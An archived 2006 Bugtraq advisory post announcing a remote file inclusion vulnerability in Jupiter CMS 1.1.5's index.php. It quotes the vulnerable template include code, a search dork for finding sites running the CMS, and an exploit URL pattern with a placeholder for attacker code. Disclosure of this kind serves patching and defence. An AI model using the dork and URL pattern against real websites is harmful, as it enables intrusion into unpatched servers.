lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 25 Aug 2006 22:50:11 -0000 From: D3nGeR@...il.CoM To: bugtraq@...urityfocus.com Subject: Jupiter CMS 1.1.5 index.php Remote File Include ################################################################################## #Jupiter CMS 1.1.5 index.php Remote File Include # #F0und by : D3nGeR #E-mail : D3nGeR@...il.CoM ################################################################################## # the code #$template = "default"; # include "templates/$template/id.php"; # $db->updateRow("config",array('value' => 'default'),"variable = 'template'"); ################################################################################## # The Expl # # dork : powered by Jupiter CMS #www.sitename.com/path/index.php?template=[Evil Code] # ##################################################################################
Powered by blists - more mailing lists